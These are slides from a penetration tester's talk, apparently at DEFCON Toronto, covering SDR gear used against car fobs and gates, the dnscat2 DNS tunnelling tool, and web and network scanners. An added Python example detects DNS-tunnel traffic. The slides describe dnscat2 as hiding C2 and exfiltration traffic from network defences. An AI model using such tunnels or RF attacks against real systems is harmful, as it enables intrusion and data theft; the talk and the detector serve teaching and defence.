- ADS-B (automatic dependent surveillance broadcast)

- Police & fire scanning

- Trucking

- Car FOB scanning

- Garage door scanning

- Gate entry scanning

- Satellite images - https://www.rtl-sdr.com/rtl-sdr-tutorial-receiving-noaa-weather-satellite-images/

- Personally I feel like this little guy out-performs devices x10 its cost

Page 58

GQRX (SDR = Software Defined Radio)

What is it?

Supports SDR hardware such as RTL-SDR, HackRF, Airspy, Funcube Dongles, etc.

Capabilities?

- Discover connected radio devices

- Process I/Q data from devices

- Change frequency gain and apply various corrections

- Mono/Stereo demodulators

- Record and playback audio/raw baseband

- Spectrum analyser mode

http://gqrx.dk/

Page 59

YARD Stick 1 (Sub-1 GHz RF transmitter & receiver)

What is it?

Yet Another Radio Dongle can transmit and receive digital wireless signals at frequencies below 1 GHz.

How does it work?

YARD Stick 1 comes with RfCat firmware installed. RfCat allows you to interactively control the dongle with a Python shell.

Capabilities?

- Half-duplex transmit and receive

- Mods: ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK

- Data rates up to 500 kbps

- Full-speed USB 2.0

Page 60

Some Radio Operated Security Controls: Doors, Gates, Barriers, Cars

Page 61

What I hacked last year: RF Lamp

Page 62

Command & Control: Commonly Used Ports (T1043)

Page 63

T1043 - dnscat2 (Encrypted data exfiltration and C2)

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

This tool is designed to create an encrypted Command and Control (C2) channel over the DNS protocol, which is an effective tunnel out of almost every network.

C2 and exfiltration over DNS provides a great mechanism to hide your traffic, evade network sensors, and get around network restrictions.

https://github.com/iagox86/dnscat2

Page 64

T1043 - dnscat2 – How does it work? (Encrypted data exfiltration and C2)

- Two sides (client & server side)

- Client is C based and runs on minimal dependencies

- Server is Ruby based and requires a few gem dependencies

- When you run the client you specify a domain name

- All requests will be sent to the local DNS resolver, which forwards them to the authoritative DNS server (which you own)

- If you don't have an authoritative DNS server you can run direct UDP/53 (which will probably get caught by firewall/network monitoring pretty easily)

- Great for tunneling any data from client to server with no protocol, upload/download files, shells, etc.

- Also, it's encrypted by default
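The two dnscat2 slides describe the traffic shape a DNS tunnel cannot avoid: one client sends many lookups for subdomains of a single domain, and each query carries encoded data in an unusually long, high-entropy label, so the recursive resolver forwards it to the attacker-controlled authoritative server. That shape is what a defender can look for in resolver logs. The following is an added example, not code from the talk or from the dnscat2 project: it parses constructed query log lines, groups them by (client, registered domain), and flags a pair when query count, mean label length and mean label entropy all exceed thresholds. The log format, the thresholds, and the two-label approximation of the registered domain are assumptions made for this example.

```python
"""Added example (not from the talk or dnscat2): flag DNS-tunnel shaped traffic
in a query log. Log lines and thresholds below are constructed."""
import math
import re
from collections import defaultdict

# Constructed log format: "<timestamp> <client_ip> <qname> <qtype>"
QUERY_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")

# Constructed sample: 10.0.0.5 and 10.0.0.9 are ordinary clients; 10.0.0.7 sends
# tunnel-style queries with 32-character hex labels under tunnel.example.net.
SAMPLE_LOG = """\
2018-10-01T10:00:01 10.0.0.5 www.example.com A
2018-10-01T10:00:02 10.0.0.5 mail.example.com MX
2018-10-01T10:00:02 10.0.0.5 static-assets-cdn.example.com A
2018-10-01T10:00:04 10.0.0.9 a.example.org A
2018-10-01T10:00:05 10.0.0.9 b.example.org A
2018-10-01T10:00:06 10.0.0.9 c.example.org A
2018-10-01T10:00:07 10.0.0.9 d.example.org A
2018-10-01T10:00:08 10.0.0.9 e.example.org A
2018-10-01T10:00:09 10.0.0.7 fedcba98765432100f1e2d3c4b5a6978.tunnel.example.net TXT
2018-10-01T10:00:09 10.0.0.7 0f1e2d3c4b5a69788796a5b4c3d2e1f0.tunnel.example.net TXT
2018-10-01T10:00:10 10.0.0.7 a5b4c3d2e1f0968713579bdf02468ace.tunnel.example.net TXT
2018-10-01T10:00:10 10.0.0.7 02468ace13579bdf6c7d8e9f0a1b2345.tunnel.example.net TXT
2018-10-01T10:00:11 10.0.0.7 3e5c7a9180b2d4f6f6d4b2081a9c7e53.tunnel.example.net TXT
2018-10-01T10:00:11 10.0.0.7 8a1f0c3e5b7d9264462d9b7e3c5f1a08.tunnel.example.net TXT
"""


def shannon_entropy(s):
    """Bits of entropy per character; encoded data scores high, words score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Assumption: the last two labels approximate the registered domain.
    Production code should use a public-suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    for line in text.splitlines():
        m = QUERY_RE.match(line.strip())
        if m:
            yield m.groupdict()


def analyse(text, min_queries=5, min_label_len=20, min_entropy=3.0):
    """Per (client, registered domain): query count, mean longest-label length,
    mean label entropy, record types seen, and whether all thresholds are met."""
    acc = defaultdict(lambda: {"queries": 0, "label_len": 0.0, "entropy": 0.0, "qtypes": set()})
    for q in parse_log(text):
        longest = max(q["qname"].rstrip(".").split("."), key=len)
        s = acc[(q["client"], registered_domain(q["qname"]))]
        s["queries"] += 1
        s["label_len"] += len(longest)
        s["entropy"] += shannon_entropy(longest)
        s["qtypes"].add(q["qtype"])
    report = {}
    for key, s in acc.items():
        n = s["queries"]
        mean_len = s["label_len"] / n
        mean_ent = s["entropy"] / n
        report[key] = {
            "queries": n,
            "mean_label_len": round(mean_len, 2),
            "mean_entropy": round(mean_ent, 2),
            "qtypes": sorted(s["qtypes"]),
            "suspicious": n >= min_queries and mean_len >= min_label_len and mean_ent >= min_entropy,
        }
    return report


def suspicious_pairs(text, **thresholds):
    """Sorted (client, domain) pairs that look like tunnel traffic."""
    return sorted(k for k, v in analyse(text, **thresholds).items() if v["suspicious"])


if __name__ == "__main__":
    for (client, domain), v in sorted(analyse(SAMPLE_LOG).items()):
        flag = "SUSPICIOUS" if v["suspicious"] else "ok"
        print(f"{client} -> {domain}: {v['queries']} queries, "
              f"len {v['mean_label_len']}, entropy {v['mean_entropy']}, {v['qtypes']} [{flag}]")
```

The three thresholds have to be met together: five short lookups to example.org are just a busy client, and one long label is just a CDN hostname. In a real resolver log the numbers need baselining, because some legitimate services (anti-malware lookups, certain CDNs) also emit long encoded labels, and the record types column is worth keeping since tunnels lean on types that carry more payload, such as TXT.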

Page 65

Discovery: Network Service Scanning (T1046)

Page 66

T1046 Network Service Scanning Tools

Tool / Description / URL

Nikto
  Description: Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs.
  URL: https://www.cirt.net/Nikto2

DirBuster
  Description: DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
  URL: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Nmap
  Description: Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing.
  URL: http://nmap.org/

Page 67

Questions?

[email protected]

Penetration Tester;

From Toronto


DEFCON Toronto – DC416

dc416.com

Organizer

@Nick_Aleks

Tweet me your feedback!